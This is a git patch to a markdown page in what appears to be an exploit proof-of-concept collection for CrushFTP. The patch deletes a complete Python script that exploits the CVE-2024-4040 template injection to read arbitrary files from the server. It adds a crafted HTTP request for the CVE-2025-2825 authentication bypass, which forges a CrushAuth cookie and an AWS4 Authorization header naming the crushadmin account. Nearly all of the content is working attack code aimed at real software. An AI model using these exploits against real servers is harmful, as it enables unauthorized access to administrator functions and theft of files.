From 59289c32d639560d19f8c83923e159de2e225f3c Mon Sep 17 00:00:00 2001
From: Rainyseason <73454853+Rainyseason-c@users.noreply.github.com>
Date: Mon, 31 Mar 2025 14:55:29 +0800
Subject: [PATCH] =?UTF-8?q?Update=20CrushFTP=E8=BA=AB=E4=BB=BD=E9=AA=8C?=
 =?UTF-8?q?=E8=AF=81=E7=BB=95=E8=BF=87(CVE-2025-2825).md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 .../CrushFTP身份验证绕过(CVE-2025-2825).md    | 63 +++----------------
 1 file changed, 8 insertions(+), 55 deletions(-)

diff --git a/wpoc/CrushFTP/CrushFTP身份验证绕过(CVE-2025-2825).md b/wpoc/CrushFTP/CrushFTP身份验证绕过(CVE-2025-2825).md
index 425dae0..59b67a4 100644
--- a/wpoc/CrushFTP/CrushFTP身份验证绕过(CVE-2025-2825).md
+++ b/wpoc/CrushFTP/CrushFTP身份验证绕过(CVE-2025-2825).md
@@ -1,60 +1,13 @@
 
-## CrushFTP服务器端模板注入(CVE-2024-4040)
+## CrushFTP身份验证绕过(CVE-2025-2825)
 
 ## poc
-```python
-import requests
-import argparse
+```javascript
+GET /WebInterface/function/?command=getUserList&c2f=1111 HTTP/1.1
+Host: target-server:8081
+Cookie: CrushAuth=1743113839553_vD96EZ70ONL6xAd1DAJhXMZYMn1111
+Authorization: AWS4-HMAC-SHA256 Credential=crushadmin/
 
-HEADER = '\033[95m'
-OKBLUE = '\033[94m'
-OKCYAN = '\033[96m'
-OKGREEN = '\033[92m'
-WARNING = '\033[93m'
-FAIL = '\033[91m'
-ENDC = '\033[0m'
-BOLD = '\033[1m'
-UNDERLINE = '\033[4m'
-
-def get_cookies(url):
-    try:
-        session = requests.Session()
-        response = session.get(url)
-        if response.status_code != 200:
-            raise Exception("Failed to connect to the server")
-        session.cookies.get_dict()
-        return session.cookies.get_dict()
-    except Exception as e:
-        print(FAIL + "Error: " + str(e) + ENDC)
-        quit()
-
-def exploit(url, cookies, path):
-    try:
-        if not path.startswith("/") or not path.endswith("/"):
-            raise Exception("Invalid path format. Path should start and end with '/'")
-        url = url + "/WebInterface/function/?command=zip&c2f=" + cookies['currentAuth'] + "&path=<INCLUDE>" + path + "</INCLUDE>&names=*"
-        response = requests.get(url, cookies=cookies)
-        if response.status_code != 200:
-            raise Exception("Failed to connect to the server")
-        return response.text
-    except Exception as e:
-        print(FAIL + "Error: " + str(e) + ENDC)
-        quit()
-
-if __name__ == "__main__":
-    parser = argparse.ArgumentParser()
-    parser.add_argument("-u", "--url", help="URL of the target", required=True)
-    parser.add_argument("-p", "--path", help="Path to the file to read", required=True)
-    args = parser.parse_args()
-    url = args.url
-    path = args.path
-    if not url.startswith("http"):
-        print(WARNING + "URL should start with 'http' or 'https'")
-        quit()
-    cookies = get_cookies(url)
-    if 'currentAuth' not in cookies:
-        print(WARNING + "Not vulnerable" + ENDC)
-        quit()
-    else:
-        print(OKCYAN + exploit(url, cookies, path) + ENDC)
 ```
+
+![image](https://github.com/user-attachments/assets/6d6a18ba-3b8b-4c65-97c0-ad24cb59e1b2)